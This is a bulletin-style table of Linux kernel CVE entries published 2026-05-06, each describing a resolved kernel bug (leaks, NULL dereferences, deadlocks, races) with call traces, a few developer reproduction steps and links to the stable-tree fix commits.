https://git.kernel.org/stable/c/26aa5295010ffaebcf8f1991c53fa7cf2ee1b20d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: iris: Add buffer to list only after successful allocation Move `list_add_tail()` to after `dma_alloc_attrs()` succeeds when creating internal buffers. Previously, the buffer was enqueued in `buffers->list` before the DMA allocation. If the allocation failed, the function returned `-ENOMEM` while leaving a partially initialized buffer in the list, which could lead to inconsistent state and potential leaks. By adding the buffer to the list only after `dma_alloc_attrs()` succeeds, we ensure the list contains only valid, fully initialized buffers. | 2026-05-06 | not yet calculated | CVE-2026-43146 | https://git.kernel.org/stable/c/45b30f65feeb4d5570d5337793bb0f298be813d2 https://git.kernel.org/stable/c/98b4c4c90f1e11caecbe2093dbe3a901d338bc81 https://git.kernel.org/stable/c/2d0bbd982dfdd67da488a772f7a8a1bdca7642bf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "PCI/IOV: Add PCI rescan-remove locking when enabling/disabling SR-IOV" This reverts commit 05703271c3cd ("PCI/IOV: Add PCI rescan-remove locking when enabling/disabling SR-IOV"), which causes a deadlock by recursively taking pci_rescan_remove_lock when sriov_del_vfs() is called as part of pci_stop_and_remove_bus_device(). For example with the following sequence of commands: $ echo <NUM> > /sys/bus/pci/devices/<pf>/sriov_numvfs $ echo 1 > /sys/bus/pci/devices/<pf>/remove A trimmed trace of the deadlock on a mlx5 device is as below: zsh/5715 is trying to acquire lock: 000002597926ef50 (pci_rescan_remove_lock){+.+.}-{3:3}, at: sriov_disable+0x34/0x140 but task is already holding lock: 000002597926ef50 (pci_rescan_remove_lock){+.+.}-{3:3}, at: pci_stop_and_remove_bus_device_locked+0x24/0x80 ... Call Trace: [<00000259778c4f90>] dump_stack_lvl+0xc0/0x110 [<00000259779c844e>] print_deadlock_bug+0x31e/0x330 [<00000259779c1908>] __lock_acquire+0x16c8/0x32f0 [<00000259779bffac>] lock_acquire+0x14c/0x350 [<00000259789643a6>] __mutex_lock_common+0xe6/0x1520 [<000002597896413c>] mutex_lock_nested+0x3c/0x50 [<00000259784a07e4>] sriov_disable+0x34/0x140 [<00000258f7d6dd80>] mlx5_sriov_disable+0x50/0x80 [mlx5_core] [<00000258f7d5745e>] remove_one+0x5e/0xf0 [mlx5_core] [<00000259784857fc>] pci_device_remove+0x3c/0xa0 [<000002597851012e>] device_release_driver_internal+0x18e/0x280 [<000002597847ae22>] pci_stop_bus_device+0x82/0xa0 [<000002597847afce>] pci_stop_and_remove_bus_device_locked+0x5e/0x80 [<00000259784972c2>] remove_store+0x72/0x90 [<0000025977e6661a>] kernfs_fop_write_iter+0x15a/0x200 [<0000025977d7241c>] vfs_write+0x24c/0x300 [<0000025977d72696>] ksys_write+0x86/0x110 [<000002597895b61c>] __do_syscall+0x14c/0x400 [<000002597896e0ee>] system_call+0x6e/0x90 This alone is not a complete fix as it restores the issue the cited commit tried to solve. A new fix will be provided as a follow on. | 2026-05-06 | not yet calculated | CVE-2026-43147 | https://git.kernel.org/stable/c/f61cdd7e9b67bb8961b0a81bf294b78343e5db05 https://git.kernel.org/stable/c/0de341b2365bad430aade0853fe09c2cbe468f59 https://git.kernel.org/stable/c/83651d37474c762920e345a3a0828f975ca4d732 https://git.kernel.org/stable/c/639265296fe6ee21b6f00e00ee2bab65f3b07252 https://git.kernel.org/stable/c/d47f27e145f8bd13f3c230da5e3af29225b4a2f7 https://git.kernel.org/stable/c/40f67686a5002c0c322fac918406bbc8d9c2ec2f https://git.kernel.org/stable/c/58677783c89681871077f50a7042b0c6380c4fd8 https://git.kernel.org/stable/c/2fa119c0e5e528453ebae9e70740e8d2d8c0ed5a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/smp: Add check for kcalloc() failure in parse_thread_groups() As kcalloc() may fail, check its return value to avoid a NULL pointer dereference when passing it to of_property_read_u32_array(). | 2026-05-06 | not yet calculated | CVE-2026-43148 | https://git.kernel.org/stable/c/1de31dba19c3cd0c1caf388a286b46df638f0b91 https://git.kernel.org/stable/c/b265e53d9adfbb5751713185843f7188aa9dd066 https://git.kernel.org/stable/c/9d0ca11258e7b452653d04310addfec1753de1a2 https://git.kernel.org/stable/c/ca46d2092f307385a7acfb42632056570d6dbbbc https://git.kernel.org/stable/c/9b85c8f624b0f8cf9b932f5a65dacd56a1f47a72 https://git.kernel.org/stable/c/8b221db0b7d24675e465e98d9326d298025a4e8d https://git.kernel.org/stable/c/33c1c6d8a28a2761ac74b0380b2563cf546c2a3a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: wan/fsl_ucc_hdlc: Fix dma_free_coherent() in uhdlc_memclean() The priv->rx_buffer and priv->tx_buffer are alloc'd together as contiguous buffers in uhdlc_init() but freed as two buffers in uhdlc_memclean(). Change the cleanup to only call dma_free_coherent() once on the whole buffer. | 2026-05-06 | not yet calculated | CVE-2026-43149 | https://git.kernel.org/stable/c/6496fb830cbb741d831225cc4e7e5601c6e42970 https://git.kernel.org/stable/c/ba8d8429e5d6c36f9a654d2b96b9e043c43d92b4 https://git.kernel.org/stable/c/011ae5dd84dc9f05eb9b8e1adff44252ac776e7b https://git.kernel.org/stable/c/0f85a9655445e67bb0238cfc983d7c383b54938e https://git.kernel.org/stable/c/84b932bc9899d43e5829e6cf088b72d73a922b2b https://git.kernel.org/stable/c/d8a522085d09b30aba1016daf1dddac37c0f0285 https://git.kernel.org/stable/c/d68994e37ac3b285692559776e0279a88a3b5f8d https://git.kernel.org/stable/c/36bd7d5deef936c4e1e3cd341598140e5c14c1d3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "media: iris: Add sanity check for stop streaming" This reverts commit ad699fa78b59241c9d71a8cafb51525f3dab04d4. Revert the check that skipped stop_streaming when the instance was in IRIS_INST_ERROR, as it caused multiple regressions: 1. Buffers were not returned to vb2 when the instance was already in error state, triggering warnings in the vb2 core because buffer completion was skipped. 2. If a session failed early (e.g. unsupported configuration), the instance transitioned to IRIS_INST_ERROR. When userspace attempted to stop streaming for cleanup, stop_streaming was skipped due to the added check, preventing proper teardown and leaving the firmware in an inconsistent state. | 2026-05-06 | not yet calculated | CVE-2026-43151 | https://git.kernel.org/stable/c/bd4f8fa216182f33c06d4c1e162975a0c42fb14e https://git.kernel.org/stable/c/a58b9d1c1cf81c0b29f1983c63c3e0c0caa68398 https://git.kernel.org/stable/c/370e19042fb8ac68109f8bdb0fdd8118baf39318 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: hid-pl: handle probe errors Errors in init must be reported back or we'll follow a NULL pointer the first time FF is used. | 2026-05-06 | not yet calculated | CVE-2026-43152 | https://git.kernel.org/stable/c/78df3de826668fe842c6061a91bc1ed68f493e80 https://git.kernel.org/stable/c/8a84149337eb5e716e6d59f48ff0374dae8d8b2b https://git.kernel.org/stable/c/926e6715b48b575ed7754bf163a67686bb2eb111 https://git.kernel.org/stable/c/449004434e1f55be85604b2645f2d07c4a92fe53 https://git.kernel.org/stable/c/04e50f45b5175bb90a06f5003113cb4ed6ba44c2 https://git.kernel.org/stable/c/1d46d07458dba369daf61fb643d40a62c8423d8e https://git.kernel.org/stable/c/7d2f4fdf134e7398847417b25743e1e04928c7d7 https://git.kernel.org/stable/c/3756a272d2cf356d2203da8474d173257f5f8521 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: fix incorrect early exits in volume label handling Crafted EROFS images containing valid volume labels can trigger incorrect early returns, leading to folio reference leaks. However, this does not cause system crashes or other severe issues. | 2026-05-06 | not yet calculated | CVE-2026-43154 | https://git.kernel.org/stable/c/8d8a878ef60801d867119b3df6a93e2982d62a71 https://git.kernel.org/stable/c/d498bd168494ad4a4bce16192bfb9ce04ca19c9a https://git.kernel.org/stable/c/3afa4da38802a4cba1c23848a32284e7e57b831b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mux: mmio: fix regmap leak on probe failure The mmio regmap that may be allocated during probe is never freed. Switch to using the device managed allocator so that the regmap is released on probe failures (e.g. probe deferral) and on driver unbind. | 2026-05-06 | not yet calculated | CVE-2026-43155 | https://git.kernel.org/stable/c/76096f156fe9dc9fbd6e4618088706e91b9b0a6c https://git.kernel.org/stable/c/cbde3c109d52564ae2c12e514c33c44345e84b2c https://git.kernel.org/stable/c/3c4ae63073d84abee5d81ce46d86a94e9dae9c89 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: usb: pegasus: enable basic endpoint checking pegasus_probe() fills URBs with hardcoded endpoint pipes without verifying the endpoint descriptors: - usb_rcvbulkpipe(dev, 1) for RX data - usb_sndbulkpipe(dev, 2) for TX data - usb_rcvintpipe(dev, 3) for status interrupts A malformed USB device can present these endpoints with transfer types that differ from what the driver assumes. Add a pegasus_usb_ep enum for endpoint numbers, replacing magic constants throughout. Add usb_check_bulk_endpoints() and usb_check_int_endpoints() calls before any resource allocation to verify endpoint types before use, rejecting devices with mismatched descriptors at probe time, and avoid triggering assertion. Similar fix to - commit 90b7f2961798 ("net: usb: rtl8150: enable basic endpoint checking") - commit 9e7021d2aeae ("net: usb: catc: enable basic endpoint checking") | 2026-05-06 | not yet calculated | CVE-2026-43156 | https://git.kernel.org/stable/c/a3e64e950a3981a8199de9798f6d21261b959171 https://git.kernel.org/stable/c/229dc9b9db475ac900182bafe258943e0e054c6d https://git.kernel.org/stable/c/26b3ec62fa1a94ac801feca47f040fc729b3c174 https://git.kernel.org/stable/c/35854ed5c40b02f95824e44398f9d2ba33727203 https://git.kernel.org/stable/c/67ba6b13dbcaf45681fb6758794c5ac5fa589a6c https://git.kernel.org/stable/c/d2e7c898cc02dfe42443489a67a45ed616cb76e9 https://git.kernel.org/stable/c/2705709f6574a088aab246af72fc95f2fea51484 https://git.kernel.org/stable/c/3d7e6ce34f4fcc7083510c28b17a7c36462a25d4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: octeontx2-af: CGX: fix bitmap leaks The RX/TX flow-control bitmaps (rx_fc_pfvf_bmap and tx_fc_pfvf_bmap) are allocated by cgx_lmac_init() but never freed in cgx_lmac_exit(). Unbinding and rebinding the driver therefore triggers kmemleak: unreferenced object (size 16): backtrace: rvu_alloc_bitmap cgx_probe Free both bitmaps during teardown. | 2026-05-06 | not yet calculated | CVE-2026-43157 | https://git.kernel.org/stable/c/ad8a13a45c5c24d0d32de9a1c3fd58498a675ece https://git.kernel.org/stable/c/013ac469596a0b8671e62d89c89ae0bd46bbe667 https://git.kernel.org/stable/c/ccef79af58b43787c25710c9da96651c6ddfe50f https://git.kernel.org/stable/c/6d389382ee655128056fbdab86baad8495ffbf33 https://git.kernel.org/stable/c/ccca14bbdcc25829d355b9f4d3249f43dadb71c1 https://git.kernel.org/stable/c/3def995c4ede842adf509c410e92d09a0cedc965 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: rtl8723bs: fix null dereference in find_network The variable pwlan has the possibility of being NULL when passed into rtw_free_network_nolock() which would later dereference the variable. | 2026-05-06 | not yet calculated | CVE-2026-43159 | https://git.kernel.org/stable/c/3b1d0c9a1f78836d0bce6fdd37f596f22c19b03e https://git.kernel.org/stable/c/1aa9c59f4b96a9056c02476c7ca89e96d15e0645 https://git.kernel.org/stable/c/48b4dec3a8bfd667cd0cd767eaf511176193e9a1 https://git.kernel.org/stable/c/cc3f83b6fb3773ad943365d1cd774b4ec050332e https://git.kernel.org/stable/c/04d24a3654ed195485bc6346a9ef326fc494a34e https://git.kernel.org/stable/c/677490a6bd4c63acdf6f48e4aaf6a23d7e6a446f https://git.kernel.org/stable/c/7fa16ffed2b9d9d44940990c1f31159770769aeb https://git.kernel.org/stable/c/41460a19654c32d39fd0e3a3671cd8d4b7b8479f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mfd: macsmc: Initialize mutex Initialize struct apple_smc's mutex in apple_smc_probe(). Using the mutex uninitialized surprisingly resulted only in occasional NULL pointer dereferences in apple_smc_read() calls from the probe() functions of sub devices. | 2026-05-06 | not yet calculated | CVE-2026-43160 | https://git.kernel.org/stable/c/a1e9e299c0d9ea42ab1067b39fb72e976d3f1bdb https://git.kernel.org/stable/c/2d5932588f029f7787f52c29174fead9bbc6b2cf https://git.kernel.org/stable/c/414f65d6736342c77d4ec5e7373039f4a09250dd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/vt-d: Skip dev-iotlb flush for inaccessible PCIe device without scalable mode PCIe endpoints with ATS enabled and passed through to userspace (e.g., QEMU, DPDK) can hard-lock the host when their link drops, either by surprise removal or by a link fault. Commit 4fc82cd907ac ("iommu/vt-d: Don't issue ATS Invalidation request when device is disconnected") adds pci_dev_is_disconnected() to devtlb_invalidation_with_pasid() so ATS invalidation is skipped only when the device is being safely removed, but it applies only when Intel IOMMU scalable mode is enabled. With scalable mode disabled or unsupported, a system hard-lock occurs when a PCIe endpoint's link drops because the Intel IOMMU waits indefinitely for an ATS invalidation that cannot complete. Call Trace: qi_submit_sync qi_flush_dev_iotlb __context_flush_dev_iotlb.part.0 domain_context_clear_one_cb pci_for_each_dma_alias device_block_translation blocking_domain_attach_dev iommu_deinit_device __iommu_group_remove_device iommu_release_device iommu_bus_notifier blocking_notifier_call_chain bus_notify device_del pci_remove_bus_device pci_stop_and_remove_bus_device pciehp_unconfigure_device pciehp_disable_slot pciehp_handle_presence_or_link_change pciehp_ist Commit 81e921fd3216 ("iommu/vt-d: Fix NULL domain on device release") adds intel_pasid_teardown_sm_context() to intel_iommu_release_device(), which calls qi_flush_dev_iotlb() and can also hard-lock the system when a PCIe endpoint's link drops. Call Trace: qi_submit_sync qi_flush_dev_iotlb __context_flush_dev_iotlb.part.0 intel_context_flush_no_pasid device_pasid_table_teardown pci_pasid_table_teardown pci_for_each_dma_alias intel_pasid_teardown_sm_context intel_iommu_release_device iommu_deinit_device __iommu_group_remove_device iommu_release_device iommu_bus_notifier blocking_notifier_call_chain bus_notify device_del pci_remove_bus_device pci_stop_and_remove_bus_device pciehp_unconfigure_device pciehp_disable_slot pciehp_handle_presence_or_link_change pciehp_ist Sometimes the endpoint loses connection without a link-down event (e.g., due to a link fault); killing the process (virsh destroy) then hard-locks the host. Call Trace: qi_submit_sync qi_flush_dev_iotlb __context_flush_dev_iotlb.part.0 domain_context_clear_one_cb pci_for_each_dma_alias device_block_translation blocking_domain_attach_dev __iommu_attach_device __iommu_device_set_domain __iommu_group_set_domain_internal iommu_detach_group vfio_iommu_type1_detach_group vfio_group_detach_container vfio_group_fops_release __fput pci_dev_is_disconnected() only covers safe-removal paths; pci_device_is_present() tests accessibility by reading vendor/device IDs and internally calls pci_dev_is_disconnected(). On a ConnectX-5 (8 GT/s, x2) this costs ~70 µs. Since __context_flush_dev_iotlb() is only called on {attach,release}_dev paths (not hot), add pci_device_is_present() there to skip inaccessible devices and avoid the hard-lock. | 2026-05-06 | not yet calculated | CVE-2026-43161 | https://git.kernel.org/stable/c/48b3f08e68b29a79527869cdde7298ca2a9b9646 https://git.kernel.org/stable/c/e70d5feb10c5ba2bbf7ca400b8f39a2f82d653e8 https://git.kernel.org/stable/c/bc0490ad9edf5c6f98e39fbbee2877b85261a5ae https://git.kernel.org/stable/c/42662d19839f34735b718129ea200e3734b07e50 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: tegra-video: Fix memory leak in __tegra_channel_try_format() The state object allocated by __v4l2_subdev_state_alloc() must be freed with __v4l2_subdev_state_free() when it is no longer needed. In __tegra_channel_try_format(), two error paths return directly after v4l2_subdev_call() fails, without freeing the allocated 'sd_state' object. This violates the requirement and causes a memory leak. Fix this by introducing a cleanup label and using goto statements in the error paths to ensure that __v4l2_subdev_state_free() is always called before the function returns. | 2026-05-06 | not yet calculated | CVE-2026-43162 | https://git.kernel.org/stable/c/6c6f419fa9c44a4b7149b0292e01bff47308ba14 https://git.kernel.org/stable/c/ca921be7a1174d5d58b28f84b683c2c0079f18c5 https://git.kernel.org/stable/c/3ca2f09061736e72ef25eec2597d00f7f44094d3 https://git.kernel.org/stable/c/2dff8966a3a889dd9d248a7e15d963b4097efcc5 https://git.kernel.org/stable/c/d92e9a18f97a1d19d4c2ff81dcfbe43591f75b5a https://git.kernel.org/stable/c/43e5302d22334f1183dec3e0d5d8007eefe2817c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/bitmap: fix GPF in write_page caused by resize race A General Protection Fault occurs in write_page() during array resize: RIP: 0010:write_page+0x22b/0x3c0 [md_mod] This is a use-after-free race between bitmap_daemon_work() and __bitmap_resize(). The daemon iterates over `bitmap->storage.filemap` without locking, while the resize path frees that storage via md_bitmap_file_unmap(). `quiesce()` does not stop the md thread, allowing concurrent access to freed pages. Fix by holding `mddev->bitmap_info.mutex` during the bitmap update. | 2026-05-06 | not yet calculated | CVE-2026-43163 | https://git.kernel.org/stable/c/140cc839fbeb1ddb33a8da8811b716d88d3905b7 https://git.kernel.org/stable/c/ebcacc7ca22d5e8a03a970f0621ae1d1356b9ae8 https://git.kernel.org/stable/c/d3af62411e19752c663fe4f424dbf49d95a4cc7c https://git.kernel.org/stable/c/d92b8fac294b5f915c50e65ce4ae2262e53614ec https://git.kernel.org/stable/c/a437e3bf30e32846079e470c1ba5ee790bccdf89 https://git.kernel.org/stable/c/9a6f8cd28bb9bb6ed86a6df19331fb08016dee7f https://git.kernel.org/stable/c/5f73c8b33df9a605a591eab72d43a969600c1f8c https://git.kernel.org/stable/c/46ef85f854dfa9d5226b3c1c46493d79556c9589 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwmon: (nct7363) Fix a resource leak in nct7363_present_pwm_fanin When calling of_parse_phandle_with_args(), the caller is responsible to call of_node_put() to release the reference of device node. In nct7363_present_pwm_fanin, it does not release the reference, causing a resource leak. | 2026-05-06 | not yet calculated | CVE-2026-43165 | https://git.kernel.org/stable/c/c8cde3ddd12ad7d0e6b5a3e0ea3914a9a778adf4 https://git.kernel.org/stable/c/fb99b58763a95e20b214fc1dd86837ae00a400b7 https://git.kernel.org/stable/c/4923bbff0bcffe488b3aa76829c829bd15b02585 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: always flush state and policy upon NETDEV_UNREGISTER event syzbot is reporting that "struct xfrm_state" refcount is leaking. unregister_netdevice: waiting for netdevsim0 to become free. Usage count = 2 ref_tracker: netdev@ffff888052f24618 has 1/1 users at __netdev_tracker_alloc include/linux/netdevice.h:4400 [inline] netdev_tracker_alloc include/linux/netdevice.h:4412 [inline] xfrm_dev_state_add+0x3a5/0x1080 net/xfrm/xfrm_device.c:316 xfrm_state_construct net/xfrm/xfrm_user.c:986 [inline] xfrm_add_sa+0x34ff/0x5fa0 net/xfrm/xfrm_user.c:1022 xfrm_user_rcv_msg+0x58e/0xc00 net/xfrm/xfrm_user.c:3507 netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2550 xfrm_netlink_rcv+0x71/0x90 net/xfrm/xfrm_user.c:3529 netlink_unicast_kernel net/netlink/af_netlink.c:1318 [inline] netlink_unicast+0x5aa/0x870 net/netlink/af_netlink.c:1344 netlink_sendmsg+0x8c8/0xdd0 net/netlink/af_netlink.c:1894 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg net/socket.c:742 [inline] ____sys_sendmsg+0xa5d/0xc30 net/socket.c:2592 ___sys_sendmsg+0x134/0x1d0 net/socket.c:2646 __sys_sendmsg+0x16d/0x220 net/socket.c:2678 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xcd/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f This is because commit d77e38e612a0 ("xfrm: Add an IPsec hardware offloading API") implemented xfrm_dev_unregister() as no-op despite xfrm_dev_state_add() from xfrm_state_construct() acquires a reference to "struct net_device". I guess that that commit expected that NETDEV_DOWN event is fired before NETDEV_UNREGISTER event fires, and also assumed that xfrm_dev_state_add() is called only if (dev->features & NETIF_F_HW_ESP) != 0. Sabrina Dubroca identified steps to reproduce the same symptoms as below. echo 0 > /sys/bus/netdevsim/new_device dev=$(ls -1 /sys/bus/netdevsim/devices/netdevsim0/net/) ip xfrm state add src 192.168.13.1 dst 192.168.13.2 proto esp \ spi 0x1000 mode tunnel aead 'rfc4106(gcm(aes))' $key 128 \ offload crypto dev $dev dir out ethtool -K $dev esp-hw-offload off echo 0 > /sys/bus/netdevsim/del_device Like these steps indicate, the NETIF_F_HW_ESP bit can be cleared after xfrm_dev_state_add() acquired a reference to "struct net_device". Also, xfrm_dev_state_add() does not check for the NETIF_F_HW_ESP bit when acquiring a reference to "struct net_device". Commit 03891f820c21 ("xfrm: handle NETDEV_UNREGISTER for xfrm device") re-introduced the NETDEV_UNREGISTER event to xfrm_dev_event(), but that commit for unknown reason chose to share xfrm_dev_down() between the NETDEV_DOWN event and the NETDEV_UNREGISTER event. I guess that that commit missed the behavior in the previous paragraph. Therefore, we need to re-introduce xfrm_dev_unregister() in order to release the reference to "struct net_device" by unconditionally flushing state and policy. | 2026-05-06 | not yet calculated | CVE-2026-43167 | https://git.kernel.org/stable/c/166801e49a5b5fc127b8c9e2f110f303cfddfbc3 https://git.kernel.org/stable/c/a3c8fede034fa27892f87c863cbd5493167d17ed https://git.kernel.org/stable/c/59581778792cbaf8ad788f4a21dc663ce986050e https://git.kernel.org/stable/c/8c75c455ecd3bfd2f36abf66edb7021c4fa19ec4 https://git.kernel.org/stable/c/4efa91a28576054aae0e6dad9cba8fed8293aef8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ocfs2: fix reflink preserve cleanup issue commit c06c303832ec ("ocfs2: fix xattr array entry __counted_by error") doesn't handle all cases and the cleanup job for preserved xattr entries still has bug: - the 'last' pointer should be shifted by one unit after cleanup an array entry. - current code logic doesn't cleanup the first entry when xh_count is 1. Note, commit c06c303832ec is also a bug fix for 0fe9b66c65f3. | 2026-05-06 | not yet calculated | CVE-2026-43168 | https://git.kernel.org/stable/c/c44d86ca949cb1e5566ad14510cc26fa1a17e2d8 https://git.kernel.org/stable/c/02acc9f72365e50eb45a56b7dacb9114ca3b503c https://git.kernel.org/stable/c/8ff329353134280b203cb2bce95311cb8f7cbd8a https://git.kernel.org/stable/c/bb273b68c1719c2925e05557f7e7099edb066680 https://git.kernel.org/stable/c/b2952dbeac2c3c527cb0519d5ffaeb95b062466a https://git.kernel.org/stable/c/3bdc3766aafb052aef4baadef455a84c1c0a059d https://git.kernel.org/stable/c/2f4daccd9d9b8b2952df7878df8c2e8ba6439398 https://git.kernel.org/stable/c/5138c936c2c82c9be8883921854bc6f7e1177d8c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/buddy: Prevent BUG_ON by validating rounded allocation When DRM_BUDDY_CONTIGUOUS_ALLOCATION is set, the requested size is rounded up to the next power-of-two via roundup_pow_of_two(). Similarly, for non-contiguous allocations with large min_block_size, the size is aligned up via round_up(). Both operations can produce a rounded size that exceeds mm->size, which later triggers BUG_ON(order > mm->max_order). Example scenarios: - 9G CONTIGUOUS allocation on 10G VRAM memory: roundup_pow_of_two(9G) = 16G > 10G - 9G allocation with 8G min_block_size on 10G VRAM memory: round_up(9G, 8G) = 16G > 10G Fix this by checking the rounded size against mm->size. For non-contiguous or range allocations where size > mm->size is invalid, return -EINVAL immediately. For contiguous allocations without range restrictions, allow the request to fall through to the existing __alloc_contig_try_harder() fallback. This ensures invalid user input returns an error or uses the fallback path instead of hitting BUG_ON. v2: (Matt A) - Add Fixes, Cc stable, and Closes tags for context | 2026-05-06 | not yet calculated | CVE-2026-43169 | https://git.kernel.org/stable/c/d764b8dd420098a4d253b8a5b27568c897edb2cf https://git.kernel.org/stable/c/6236c1cd9fdf433d39ed28b2491ccdfe7ae95061 https://git.kernel.org/stable/c/ecb32c60d8cbed2ee9ce9f343b6aa2f32babc727 https://git.kernel.org/stable/c/5488a29596cdba93a60a79398dc9b69d5bdadf92 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: dwc3: gadget: Move vbus draw to workqueue context Currently dwc3_gadget_vbus_draw() can be called from atomic context, which in turn invokes power-supply-core APIs. And some these PMIC APIs have operations that may sleep, leading to kernel panic. Fix this by moving the vbus_draw into a workqueue context. | 2026-05-06 | not yet calculated | CVE-2026-43170 | https://git.kernel.org/stable/c/76c1123ffccfaba95cf4ecc2a50f95504a522424 https://git.kernel.org/stable/c/a7a80c25b65112768eeba58a7af129d3c52a6d90 https://git.kernel.org/stable/c/2333653ef854c2cc124077f71a8526f03bf6e06a https://git.kernel.org/stable/c/74a231e3d99d310497ab0ccb359539a6063b316a https://git.kernel.org/stable/c/54aaa3b387c2f580a99dc86a9cc2eb6dfaf599a7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: EFI/CPER: don't dump the entire memory region The current logic at cper_print_fw_err() doesn't check if the error record length is big enough to handle offset. On a bad firmware, if the ofset is above the actual record, length -= offset will underflow, making it dump the entire memory. The end result can be: - the logic taking a lot of time dumping large regions of memory; - data disclosure due to the memory dumps; - an OOPS, if it tries to dump an unmapped memory region. Fix it by checking if the section length is too small before doing a hex dump. [ rjw: Subject tweaks ] | 2026-05-06 | not yet calculated | CVE-2026-43171 | https://git.kernel.org/stable/c/02de64ab54b4bb0f1b21bb324aeff3b08612be33 https://git.kernel.org/stable/c/0e09b522f2622841389c3b2f9ac4969e35c0809d https://git.kernel.org/stable/c/64ae5aaa7ac93c83da456039e8ec747bfa8a7cff https://git.kernel.org/stable/c/5a9b1dda8481b82851a655c3bcc5b44879b95334 https://git.kernel.org/stable/c/7780c0bad2a3a70a8c0113a33c02f4151d901eb3 https://git.kernel.org/stable/c/a8419f5f2c5f2d80848ddabb2b95cf0da84a5f91 https://git.kernel.org/stable/c/54e131db4cdffd946db890ff33ff2647053fd4f6 https://git.kernel.org/stable/c/55cc6fe5716f678f06bcb95140882dfa684464ec |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ethernet: xscale: Check for PTP support properly In ixp4xx_get_ts_info() ixp46x_ptp_find() is called unconditionally despite this feature only existing on ixp46x, leading to the following splat from tcpdump: root@OpenWrt:~# tcpdump -vv -X -i eth0 (...) Unable to handle kernel NULL pointer dereference at virtual address 00000238 when read (...) Call trace: ptp_clock_index from ixp46x_ptp_find+0x1c/0x38 ixp46x_ptp_find from ixp4xx_get_ts_info+0x4c/0x64 ixp4xx_get_ts_info from __ethtool_get_ts_info+0x90/0x108 __ethtool_get_ts_info from __dev_ethtool+0xa00/0x2648 __dev_ethtool from dev_ethtool+0x160/0x234 dev_ethtool from dev_ioctl+0x2cc/0x460 dev_ioctl from sock_ioctl+0x1ec/0x524 sock_ioctl from sys_ioctl+0x51c/0xa94 sys_ioctl from ret_fast_syscall+0x0/0x44 (...) Segmentation fault Check for ixp46x in ixp46x_ptp_find() before trying to set up PTP to avoid this. To avoid altering the returned error code from ixp4xx_hwtstamp_set() which before this patch was -EOPNOTSUPP, we return -EOPNOTSUPP from ixp4xx_hwtstamp_set() if ixp46x_ptp_find() fails no matter the error code. The helper function ixp46x_ptp_find() helper returns -ENODEV. | 2026-05-06 | not yet calculated | CVE-2026-43173 | https://git.kernel.org/stable/c/144dde3146985b25fa84d4e4b7c3d11e0f5fc5a4 https://git.kernel.org/stable/c/5195b10c34b8993194ad12ad7d8f54d861be084b https://git.kernel.org/stable/c/322437972f0a712767f6920ad34aba25f2e9b942 https://git.kernel.org/stable/c/21d1e80d0d6e7d0c3cd8b1e001ed1fa92fb9f3f5 https://git.kernel.org/stable/c/2d74412dfd3621552a394d55cc3dd26a7cbf608e https://git.kernel.org/stable/c/cbecebd35909f6cd0f6fb773f0fb73da99e02f8c https://git.kernel.org/stable/c/594163ea88a03bdb412063af50fc7177ef3cbeae |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/zcrx: fix post open error handling Closing a queue doesn't guarantee that all associated page pools are terminated right away, let the refcounting do the work instead of releasing the zcrx ctx directly. | 2026-05-06 | not yet calculated | CVE-2026-43174 | https://git.kernel.org/stable/c/18afaff077b46655a8eb6fd7f6de1b81327be577 https://git.kernel.org/stable/c/5d540e4508950c674d6feef1d95463d039bbf4f5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: rs9: Reserve 8 struct clk_hw slots for for 9FGV0841 The 9FGV0841 has 8 outputs and registers 8 struct clk_hw, make sure there are 8 slots for those newly registered clk_hw pointers, else there is going to be out of bounds write when pointers 4..7 are set into struct rs9_driver_data .clk_dif[4..7] field. Since there are other structure members past this struct clk_hw pointer array, writing to .clk_dif[4..7] fields corrupts both the struct rs9_driver_data content and data around it, sometimes without crashing the kernel. However, the kernel does surely crash when the driver is unbound or during suspend. Fix this, increase the struct clk_hw pointer array size to the maximum output count of 9FGV0841, which is the biggest chip that is supported by this driver. | 2026-05-06 | not yet calculated | CVE-2026-43175 | https://git.kernel.org/stable/c/2f926875dffe2226ea26d129e16d9092cccd03aa https://git.kernel.org/stable/c/da86ca15d7389ee0b5df08e8f70c39354e6b8a4b https://git.kernel.org/stable/c/82a34f344999d8029bcebf131028fa519140c7cc https://git.kernel.org/stable/c/5ec820fc28d0b8a0f3890d476b1976f20e8343cc |
